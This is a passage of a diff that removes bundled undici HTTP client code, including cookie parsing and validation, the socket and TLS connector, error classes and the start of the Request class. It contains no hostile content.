%x3B (";") character). - assert(unparsedAttributes[0] === ';') - unparsedAttributes = unparsedAttributes.slice(1) - - let cookieAv = '' - - // 3. If the remaining unparsed-attributes contains a %x3B (";") - // character: - if (unparsedAttributes.includes(';')) { - // 1. Consume the characters of the unparsed-attributes up to, but - // not including, the first %x3B (";") character. - cookieAv = collectASequenceOfCodePointsFast( - ';', - unparsedAttributes, - { position: 0 } - ) - unparsedAttributes = unparsedAttributes.slice(cookieAv.length) - } else { - // Otherwise: - - // 1. Consume the remainder of the unparsed-attributes. - cookieAv = unparsedAttributes - unparsedAttributes = '' - } - - // Let the cookie-av string be the characters consumed in this step. - - let attributeName = '' - let attributeValue = '' - - // 4. If the cookie-av string contains a %x3D ("=") character: - if (cookieAv.includes('=')) { - // 1. The (possibly empty) attribute-name string consists of the - // characters up to, but not including, the first %x3D ("=") - // character, and the (possibly empty) attribute-value string - // consists of the characters after the first %x3D ("=") - // character. - const position = { position: 0 } - - attributeName = collectASequenceOfCodePointsFast( - '=', - cookieAv, - position - ) - attributeValue = cookieAv.slice(position.position + 1) - } else { - // Otherwise: - - // 1. The attribute-name string consists of the entire cookie-av - // string, and the attribute-value string is empty. - attributeName = cookieAv - } - - // 5. Remove any leading or trailing WSP characters from the attribute- - // name string and the attribute-value string. - attributeName = attributeName.trim() - attributeValue = attributeValue.trim() - - // 6. If the attribute-value is longer than 1024 octets, ignore the - // cookie-av string and return to Step 1 of this algorithm. - if (attributeValue.length > maxAttributeValueSize) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 7. Process the attribute-name and attribute-value according to the - // requirements in the following subsections. (Notice that - // attributes with unrecognized attribute-names are ignored.) - const attributeNameLowercase = attributeName.toLowerCase() - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 - // If the attribute-name case-insensitively matches the string - // "Expires", the user agent MUST process the cookie-av as follows. - if (attributeNameLowercase === 'expires') { - // 1. Let the expiry-time be the result of parsing the attribute-value - // as cookie-date (see Section 5.1.1). - const expiryTime = new Date(attributeValue) - - // 2. If the attribute-value failed to parse as a cookie date, ignore - // the cookie-av. - - cookieAttributeList.expires = expiryTime - } else if (attributeNameLowercase === 'max-age') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 - // If the attribute-name case-insensitively matches the string "Max- - // Age", the user agent MUST process the cookie-av as follows. - - // 1. If the first character of the attribute-value is not a DIGIT or a - // "-" character, ignore the cookie-av. - const charCode = attributeValue.charCodeAt(0) - - if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 2. If the remainder of attribute-value contains a non-DIGIT - // character, ignore the cookie-av. - if (!/^\d+$/.test(attributeValue)) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 3. Let delta-seconds be the attribute-value converted to an integer. - const deltaSeconds = Number(attributeValue) - - // 4. Let cookie-age-limit be the maximum age of the cookie (which - // SHOULD be 400 days or less, see Section 4.1.2.2). - - // 5. Set delta-seconds to the smaller of its present value and cookie- - // age-limit. - // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) - - // 6. If delta-seconds is less than or equal to zero (0), let expiry- - // time be the earliest representable date and time. Otherwise, let - // the expiry-time be the current date and time plus delta-seconds - // seconds. - // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds - - // 7. Append an attribute to the cookie-attribute-list with an - // attribute-name of Max-Age and an attribute-value of expiry-time. - cookieAttributeList.maxAge = deltaSeconds - } else if (attributeNameLowercase === 'domain') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 - // If the attribute-name case-insensitively matches the string "Domain", - // the user agent MUST process the cookie-av as follows. - - // 1. Let cookie-domain be the attribute-value. - let cookieDomain = attributeValue - - // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be - // cookie-domain without its leading %x2E ("."). - if (cookieDomain[0] === '.') { - cookieDomain = cookieDomain.slice(1) - } - - // 3. Convert the cookie-domain to lower case. - cookieDomain = cookieDomain.toLowerCase() - - // 4. Append an attribute to the cookie-attribute-list with an - // attribute-name of Domain and an attribute-value of cookie-domain. - cookieAttributeList.domain = cookieDomain - } else if (attributeNameLowercase === 'path') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 - // If the attribute-name case-insensitively matches the string "Path", - // the user agent MUST process the cookie-av as follows. - - // 1. If the attribute-value is empty or if the first character of the - // attribute-value is not %x2F ("/"): - let cookiePath = '' - if (attributeValue.length === 0 || attributeValue[0] !== '/') { - // 1. Let cookie-path be the default-path. - cookiePath = '/' - } else { - // Otherwise: - - // 1. Let cookie-path be the attribute-value. - cookiePath = attributeValue - } - - // 2. Append an attribute to the cookie-attribute-list with an - // attribute-name of Path and an attribute-value of cookie-path. - cookieAttributeList.path = cookiePath - } else if (attributeNameLowercase === 'secure') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 - // If the attribute-name case-insensitively matches the string "Secure", - // the user agent MUST append an attribute to the cookie-attribute-list - // with an attribute-name of Secure and an empty attribute-value. - - cookieAttributeList.secure = true - } else if (attributeNameLowercase === 'httponly') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 - // If the attribute-name case-insensitively matches the string - // "HttpOnly", the user agent MUST append an attribute to the cookie- - // attribute-list with an attribute-name of HttpOnly and an empty - // attribute-value. - - cookieAttributeList.httpOnly = true - } else if (attributeNameLowercase === 'samesite') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 - // If the attribute-name case-insensitively matches the string - // "SameSite", the user agent MUST process the cookie-av as follows: - - // 1. Let enforcement be "Default". - let enforcement = 'Default' - - const attributeValueLowercase = attributeValue.toLowerCase() - // 2. If cookie-av's attribute-value is a case-insensitive match for - // "None", set enforcement to "None". - if (attributeValueLowercase.includes('none')) { - enforcement = 'None' - } - - // 3. If cookie-av's attribute-value is a case-insensitive match for - // "Strict", set enforcement to "Strict". - if (attributeValueLowercase.includes('strict')) { - enforcement = 'Strict' - } - - // 4. If cookie-av's attribute-value is a case-insensitive match for - // "Lax", set enforcement to "Lax". - if (attributeValueLowercase.includes('lax')) { - enforcement = 'Lax' - } - - // 5. Append an attribute to the cookie-attribute-list with an - // attribute-name of "SameSite" and an attribute-value of - // enforcement. - cookieAttributeList.sameSite = enforcement - } else { - cookieAttributeList.unparsed ??= [] - - cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) - } - - // 8. Return to Step 1 of this algorithm. - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) -} - -module.exports = { - parseSetCookie, - parseUnparsedAttributes -} - - -/***/ }), - -/***/ 3121: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kHeadersList } = __nccwpck_require__(2785) - -function isCTLExcludingHtab (value) { - if (value.length === 0) { - return false - } - - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - (code >= 0x00 || code <= 0x08) || - (code >= 0x0A || code <= 0x1F) || - code === 0x7F - ) { - return false - } - } -} - -/** - CHAR = - token = 1* - separators = "(" | ")" | "<" | ">" | "@" - | "," | ";" | ":" | "\" | <"> - | "/" | "[" | "]" | "?" | "=" - | "{" | "}" | SP | HT - * @param {string} name - */ -function validateCookieName (name) { - for (const char of name) { - const code = char.charCodeAt(0) - - if ( - (code <= 0x20 || code > 0x7F) || - char === '(' || - char === ')' || - char === '>' || - char === '<' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' - ) { - throw new Error('Invalid cookie name') - } - } -} - -/** - cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) - cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E - ; US-ASCII characters excluding CTLs, - ; whitespace DQUOTE, comma, semicolon, - ; and backslash - * @param {string} value - */ -function validateCookieValue (value) { - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || // exclude CTLs (0-31) - code === 0x22 || - code === 0x2C || - code === 0x3B || - code === 0x5C || - code > 0x7E // non-ascii - ) { - throw new Error('Invalid header value') - } - } -} - -/** - * path-value = - * @param {string} path - */ -function validateCookiePath (path) { - for (const char of path) { - const code = char.charCodeAt(0) - - if (code < 0x21 || char === ';') { - throw new Error('Invalid cookie path') - } - } -} - -/** - * I have no idea why these values aren't allowed to be honest, - * but Deno tests these. - Khafra - * @param {string} domain - */ -function validateCookieDomain (domain) { - if ( - domain.startsWith('-') || - domain.endsWith('.') || - domain.endsWith('-') - ) { - throw new Error('Invalid cookie domain') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 - * @param {number|Date} date - IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT - ; fixed length/zone/capitalization subset of the format - ; see Section 3.3 of [RFC5322] - - day-name = %x4D.6F.6E ; "Mon", case-sensitive - / %x54.75.65 ; "Tue", case-sensitive - / %x57.65.64 ; "Wed", case-sensitive - / %x54.68.75 ; "Thu", case-sensitive - / %x46.72.69 ; "Fri", case-sensitive - / %x53.61.74 ; "Sat", case-sensitive - / %x53.75.6E ; "Sun", case-sensitive - date1 = day SP month SP year - ; e.g., 02 Jun 1982 - - day = 2DIGIT - month = %x4A.61.6E ; "Jan", case-sensitive - / %x46.65.62 ; "Feb", case-sensitive - / %x4D.61.72 ; "Mar", case-sensitive - / %x41.70.72 ; "Apr", case-sensitive - / %x4D.61.79 ; "May", case-sensitive - / %x4A.75.6E ; "Jun", case-sensitive - / %x4A.75.6C ; "Jul", case-sensitive - / %x41.75.67 ; "Aug", case-sensitive - / %x53.65.70 ; "Sep", case-sensitive - / %x4F.63.74 ; "Oct", case-sensitive - / %x4E.6F.76 ; "Nov", case-sensitive - / %x44.65.63 ; "Dec", case-sensitive - year = 4DIGIT - - GMT = %x47.4D.54 ; "GMT", case-sensitive - - time-of-day = hour ":" minute ":" second - ; 00:00:00 - 23:59:60 (leap second) - - hour = 2DIGIT - minute = 2DIGIT - second = 2DIGIT - */ -function toIMFDate (date) { - if (typeof date === 'number') { - date = new Date(date) - } - - const days = [ - 'Sun', 'Mon', 'Tue', 'Wed', - 'Thu', 'Fri', 'Sat' - ] - - const months = [ - 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', - 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' - ] - - const dayName = days[date.getUTCDay()] - const day = date.getUTCDate().toString().padStart(2, '0') - const month = months[date.getUTCMonth()] - const year = date.getUTCFullYear() - const hour = date.getUTCHours().toString().padStart(2, '0') - const minute = date.getUTCMinutes().toString().padStart(2, '0') - const second = date.getUTCSeconds().toString().padStart(2, '0') - - return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` -} - -/** - max-age-av = "Max-Age=" non-zero-digit *DIGIT - ; In practice, both expires-av and max-age-av - ; are limited to dates representable by the - ; user agent. - * @param {number} maxAge - */ -function validateCookieMaxAge (maxAge) { - if (maxAge < 0) { - throw new Error('Invalid cookie max-age') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 - * @param {import('./index').Cookie} cookie - */ -function stringify (cookie) { - if (cookie.name.length === 0) { - return null - } - - validateCookieName(cookie.name) - validateCookieValue(cookie.value) - - const out = [`${cookie.name}=${cookie.value}`] - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 - if (cookie.name.startsWith('__Secure-')) { - cookie.secure = true - } - - if (cookie.name.startsWith('__Host-')) { - cookie.secure = true - cookie.domain = null - cookie.path = '/' - } - - if (cookie.secure) { - out.push('Secure') - } - - if (cookie.httpOnly) { - out.push('HttpOnly') - } - - if (typeof cookie.maxAge === 'number') { - validateCookieMaxAge(cookie.maxAge) - out.push(`Max-Age=${cookie.maxAge}`) - } - - if (cookie.domain) { - validateCookieDomain(cookie.domain) - out.push(`Domain=${cookie.domain}`) - } - - if (cookie.path) { - validateCookiePath(cookie.path) - out.push(`Path=${cookie.path}`) - } - - if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { - out.push(`Expires=${toIMFDate(cookie.expires)}`) - } - - if (cookie.sameSite) { - out.push(`SameSite=${cookie.sameSite}`) - } - - for (const part of cookie.unparsed) { - if (!part.includes('=')) { - throw new Error('Invalid unparsed') - } - - const [key, ...value] = part.split('=') - - out.push(`${key.trim()}=${value.join('=')}`) - } - - return out.join('; ') -} - -let kHeadersListNode - -function getHeadersList (headers) { - if (headers[kHeadersList]) { - return headers[kHeadersList] - } - - if (!kHeadersListNode) { - kHeadersListNode = Object.getOwnPropertySymbols(headers).find( - (symbol) => symbol.description === 'headers list' - ) - - assert(kHeadersListNode, 'Headers cannot be parsed') - } - - const headersList = headers[kHeadersListNode] - assert(headersList) - - return headersList -} - -module.exports = { - isCTLExcludingHtab, - stringify, - getHeadersList -} - - -/***/ }), - -/***/ 2067: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const net = __nccwpck_require__(1808) -const assert = __nccwpck_require__(9491) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) - -let tls // include tls conditionally since it is not always available - -// TODO: session re-use does not wait for the first -// connection to resolve the session and might therefore -// resolve the same servername multiple times even when -// re-use is enabled. - -let SessionCache -// FIXME: remove workaround when the Node bug is fixed -// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 -if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { - SessionCache = class WeakSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - this._sessionRegistry = new global.FinalizationRegistry((key) => { - if (this._sessionCache.size < this._maxCachedSessions) { - return - } - - const ref = this._sessionCache.get(key) - if (ref !== undefined && ref.deref() === undefined) { - this._sessionCache.delete(key) - } - }) - } - - get (sessionKey) { - const ref = this._sessionCache.get(sessionKey) - return ref ? ref.deref() : null - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - this._sessionCache.set(sessionKey, new WeakRef(session)) - this._sessionRegistry.register(session, sessionKey) - } - } -} else { - SessionCache = class SimpleSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - } - - get (sessionKey) { - return this._sessionCache.get(sessionKey) - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - if (this._sessionCache.size >= this._maxCachedSessions) { - // remove the oldest session - const { value: oldestKey } = this._sessionCache.keys().next() - this._sessionCache.delete(oldestKey) - } - - this._sessionCache.set(sessionKey, session) - } - } -} - -function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { - if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { - throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') - } - - const options = { path: socketPath, ...opts } - const sessionCache = new SessionCache(maxCachedSessions == null ? 100 : maxCachedSessions) - timeout = timeout == null ? 10e3 : timeout - allowH2 = allowH2 != null ? allowH2 : false - return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { - let socket - if (protocol === 'https:') { - if (!tls) { - tls = __nccwpck_require__(4404) - } - servername = servername || options.servername || util.getServerName(host) || null - - const sessionKey = servername || hostname - const session = sessionCache.get(sessionKey) || null - - assert(sessionKey) - - socket = tls.connect({ - highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... - ...options, - servername, - session, - localAddress, - // TODO(HTTP/2): Add support for h2c - ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], - socket: httpSocket, // upgrade socket connection - port: port || 443, - host: hostname - }) - - socket - .on('session', function (session) { - // TODO (fix): Can a session become invalid once established? Don't think so? - sessionCache.set(sessionKey, session) - }) - } else { - assert(!httpSocket, 'httpSocket can only be sent on TLS update') - socket = net.connect({ - highWaterMark: 64 * 1024, // Same as nodejs fs streams. - ...options, - localAddress, - port: port || 80, - host: hostname - }) - } - - // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket - if (options.keepAlive == null || options.keepAlive) { - const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay - socket.setKeepAlive(true, keepAliveInitialDelay) - } - - const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) - - socket - .setNoDelay(true) - .once(protocol === 'https:' ? 'secureConnect' : 'connect', function () { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(null, this) - } - }) - .on('error', function (err) { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(err) - } - }) - - return socket - } -} - -function setupTimeout (onConnectTimeout, timeout) { - if (!timeout) { - return () => {} - } - - let s1 = null - let s2 = null - const timeoutId = setTimeout(() => { - // setImmediate is added to make sure that we priotorise socket error events over timeouts - s1 = setImmediate(() => { - if (process.platform === 'win32') { - // Windows needs an extra setImmediate probably due to implementation differences in the socket logic - s2 = setImmediate(() => onConnectTimeout()) - } else { - onConnectTimeout() - } - }) - }, timeout) - return () => { - clearTimeout(timeoutId) - clearImmediate(s1) - clearImmediate(s2) - } -} - -function onConnectTimeout (socket) { - util.destroy(socket, new ConnectTimeoutError()) -} - -module.exports = buildConnector - - -/***/ }), - -/***/ 8045: -/***/ ((module) => { - -"use strict"; - - -class UndiciError extends Error { - constructor (message) { - super(message) - this.name = 'UndiciError' - this.code = 'UND_ERR' - } -} - -class ConnectTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ConnectTimeoutError) - this.name = 'ConnectTimeoutError' - this.message = message || 'Connect Timeout Error' - this.code = 'UND_ERR_CONNECT_TIMEOUT' - } -} - -class HeadersTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersTimeoutError) - this.name = 'HeadersTimeoutError' - this.message = message || 'Headers Timeout Error' - this.code = 'UND_ERR_HEADERS_TIMEOUT' - } -} - -class HeadersOverflowError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersOverflowError) - this.name = 'HeadersOverflowError' - this.message = message || 'Headers Overflow Error' - this.code = 'UND_ERR_HEADERS_OVERFLOW' - } -} - -class BodyTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, BodyTimeoutError) - this.name = 'BodyTimeoutError' - this.message = message || 'Body Timeout Error' - this.code = 'UND_ERR_BODY_TIMEOUT' - } -} - -class ResponseStatusCodeError extends UndiciError { - constructor (message, statusCode, headers, body) { - super(message) - Error.captureStackTrace(this, ResponseStatusCodeError) - this.name = 'ResponseStatusCodeError' - this.message = message || 'Response Status Code Error' - this.code = 'UND_ERR_RESPONSE_STATUS_CODE' - this.body = body - this.status = statusCode - this.statusCode = statusCode - this.headers = headers - } -} - -class InvalidArgumentError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidArgumentError) - this.name = 'InvalidArgumentError' - this.message = message || 'Invalid Argument Error' - this.code = 'UND_ERR_INVALID_ARG' - } -} - -class InvalidReturnValueError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidReturnValueError) - this.name = 'InvalidReturnValueError' - this.message = message || 'Invalid Return Value Error' - this.code = 'UND_ERR_INVALID_RETURN_VALUE' - } -} - -class RequestAbortedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestAbortedError) - this.name = 'AbortError' - this.message = message || 'Request aborted' - this.code = 'UND_ERR_ABORTED' - } -} - -class InformationalError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InformationalError) - this.name = 'InformationalError' - this.message = message || 'Request information' - this.code = 'UND_ERR_INFO' - } -} - -class RequestContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestContentLengthMismatchError) - this.name = 'RequestContentLengthMismatchError' - this.message = message || 'Request body length does not match content-length header' - this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' - } -} - -class ResponseContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseContentLengthMismatchError) - this.name = 'ResponseContentLengthMismatchError' - this.message = message || 'Response body length does not match content-length header' - this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' - } -} - -class ClientDestroyedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientDestroyedError) - this.name = 'ClientDestroyedError' - this.message = message || 'The client is destroyed' - this.code = 'UND_ERR_DESTROYED' - } -} - -class ClientClosedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientClosedError) - this.name = 'ClientClosedError' - this.message = message || 'The client is closed' - this.code = 'UND_ERR_CLOSED' - } -} - -class SocketError extends UndiciError { - constructor (message, socket) { - super(message) - Error.captureStackTrace(this, SocketError) - this.name = 'SocketError' - this.message = message || 'Socket error' - this.code = 'UND_ERR_SOCKET' - this.socket = socket - } -} - -class NotSupportedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'NotSupportedError' - this.message = message || 'Not supported error' - this.code = 'UND_ERR_NOT_SUPPORTED' - } -} - -class BalancedPoolMissingUpstreamError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'MissingUpstreamError' - this.message = message || 'No upstream has been added to the BalancedPool' - this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' - } -} - -class HTTPParserError extends Error { - constructor (message, code, data) { - super(message) - Error.captureStackTrace(this, HTTPParserError) - this.name = 'HTTPParserError' - this.code = code ? `HPE_${code}` : undefined - this.data = data ? data.toString() : undefined - } -} - -class ResponseExceededMaxSizeError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseExceededMaxSizeError) - this.name = 'ResponseExceededMaxSizeError' - this.message = message || 'Response content exceeded max size' - this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' - } -} - -class RequestRetryError extends UndiciError { - constructor (message, code, { headers, data }) { - super(message) - Error.captureStackTrace(this, RequestRetryError) - this.name = 'RequestRetryError' - this.message = message || 'Request retry error' - this.code = 'UND_ERR_REQ_RETRY' - this.statusCode = code - this.data = data - this.headers = headers - } -} - -module.exports = { - HTTPParserError, - UndiciError, - HeadersTimeoutError, - HeadersOverflowError, - BodyTimeoutError, - RequestContentLengthMismatchError, - ConnectTimeoutError, - ResponseStatusCodeError, - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError, - ClientDestroyedError, - ClientClosedError, - InformationalError, - SocketError, - NotSupportedError, - ResponseContentLengthMismatchError, - BalancedPoolMissingUpstreamError, - ResponseExceededMaxSizeError, - RequestRetryError -} - - -/***/ }), - -/***/ 2905: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - InvalidArgumentError, - NotSupportedError -} = __nccwpck_require__(8045) -const assert = __nccwpck_require__(9491) -const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) -const util = __nccwpck_require__(3983) - -// tokenRegExp and headerCharRegex have been lifted from -// https://github.com/nodejs/node/blob/main/lib/_http_common.js - -/** - * Verifies that the given val is a valid HTTP token - * per the rules defined in RFC 7230 - * See https://tools.ietf.org/html/rfc7230#section-3.2.6 - */ -const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ - -/** - * Matches if val contains an invalid field-vchar - * field-value = *( field-content / obs-fold ) - * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] - * field-vchar = VCHAR / obs-text - */ -const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ - -// Verifies that a given path is valid does not contain control chars \x00 to \x20 -const invalidPathRegex = /[^\u0021-\u00ff]/ - -const kHandler = Symbol('handler') - -const channels = {} - -let extractBody - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.create = diagnosticsChannel.channel('undici:request:create') - channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') - channels.headers = diagnosticsChannel.channel('undici:request:headers') - channels.trailers = diagnosticsChannel.channel('undici:request:trailers') - channels.error = diagnosticsChannel.channel('undici:request:error') -} catch { - channels.create = { hasSubscribers: false } - channels.bodySent = { hasSubscribers: false } - channels.headers = { hasSubscribers: false } - channels.trailers = { hasSubscribers: false } - channels.error = { hasSubscribers: false } -} - -class Request { - constructor (origin, { - path, - method, - body, - headers, - query, - idempotent, - blocking, - upgrade, - headersTimeout, - bodyTimeout, - reset, - throwOnError, - expectContinue - }, handler) { - if (typeof path !== 'string') { - throw new InvalidArgumentError('path must be a string') - } else if ( - path[0] !== '/' && - !(path.startsWith('http://') || path.startsWith('https://')) && - method !== 'CONNECT' - ) { - throw new InvalidArgumentError('path must be an absolute URL or start with a slash') - } else if (invalidPathRegex.exec(path) !== null) { - throw new InvalidArgumentError('invalid request path') - } - - if (typeof method !== 'string') { - throw new InvalidArgumentError('method must be a string') - } else if (tokenRegExp.exec(method) === null) { - throw new InvalidArgumentError('invalid request method') - } - - if (upgrade && typeof upgrade !== 'string') { - throw new InvalidArgumentError('upgrade must be a string') - } - - if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('invalid headersTimeout') - } - - if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('invalid bodyTimeout') - } - - if (reset != null && typeof reset !== 'boolean') { - throw new InvalidArgumentError('invalid reset') - } - - if (expectContinue != null && typeof expectContinue !== 'boolean') { - throw new InvalidArgumentError('invalid expectContinue') - } - - this.headersTimeout = headersTimeout - - this.bodyTimeout = bodyTimeout - - this.throwOnError = throwOnError === true - - this.method = method - - this.abort = null - - if (body == null) { - this.body = null - } else if (util.isStream(body)) { - this.body = body - - const rState = this.body._readableState - if (!rState || !rState.autoDestroy) { - this.endHandler = function autoDestroy () { - util.destroy(this) - } - this.body.on('end', this.endHandler) - } - - this.errorHandler = err => { - if (this.abort) { - this.abort(err) - } else { - this.error = err - } - } - this.body.on('error', this.errorHandler) - } else if (util.isBuffer(body)) { - this.body = body.byteLength ? body : null - } else if (ArrayBuffer.isView(body)) { - this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null - } else if (body instanceof ArrayBuffer) { - this.body = body.byteLength ? Buffer.from(body) : null - } else if (typeof body === 'string') { - this.body = body.length ? Buffer.from(body) : null - } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { - this.body = body - } else { - throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') - } - - this.completed = false - - this.aborted = false - - this.upgrade = upgrade || null - - this.path = query ? util.buildURL(path, query) : path - - this.origin = origin - - this.idempotent = idempotent == null - ? method === 'HEAD' || method === 'GET' - : idempotent - - this.blocking = blocking == null ? false : blocking - - this.reset = reset == null ? null : reset - - this.host = null - - this.contentLength = null - - this.contentType = null - - this.headers = '' - - // Only for H2 - this.expectContinue = expectContinue != null ? expectContinue : false - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(this, headers[i], headers[i + 1]) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(this, key, headers[key]) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - if (util.isFormDataLike(this.body)) { - if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { - throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') - } - - if (!extractBody) { - extractBody = (__nccwpck_require__(1472).extractBody) - } - - const [bodyStream, contentType] = extractBody(body) - if (this.contentType == null) { - this.contentType = contentType - this.headers += `content-type: ${contentType}\r\n` - } - this.body = bodyStream.stream - this.contentLength = bodyStream.length - } else if (util.isBlobLike(body) && this.contentType == null && body.type) { - this.contentType = body.type - this.headers += `content-type: ${body.type}\r\n` - } - - util.validateHandler(handler, method, upgrade) - - this.servername = util.getServerName(this.host) - - this[kHandler] = handler - - if (channels.create.hasSubscribers) { - channels.create.publish({ request: this }) - } - } - - onBodySent (chunk) { - if (this[kHandler].onBodySent) { - try { - return this[kHandler].onBodySent(chunk) - } catch (err) { - this.abort(err) - } - } - } - - onRequestSent () { - if (channels.bodySent.hasSubscribers) { - channels.bodySent.publish({ request: this }) - } - - if (this[kHandler].onRequestSent) { - try { - return this[kHandler].onRequestSent() - } catch (err) { - this.abort(err) - } - } - } - - onConnect (abort) { - assert(!this.aborted) - assert(!this.completed) - - if (this.error) { - abort(this.error) - } else { - this.abort = abort - return this[kHandler].onConnect(abort) - } - } - - onHeaders (statusCode, headers, resume, statusText) { - assert(!this.aborted) - assert(!this.completed) - - if (channels.headers.hasSubscribers) { - channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) - } - - try { - return this[kHandler].onHeaders(statusCode, headers, resume, statusText) - } catch (err) { - this.abort(err) - } - } - - onData (chunk) { - assert(!this.aborted) - assert(!this.completed) - - try { - return this[kHandler].onData(chunk) - } catch (err) { - this.abort(err) - return false - } - } - - onUpgrade (statusCode, headers, socket) { - 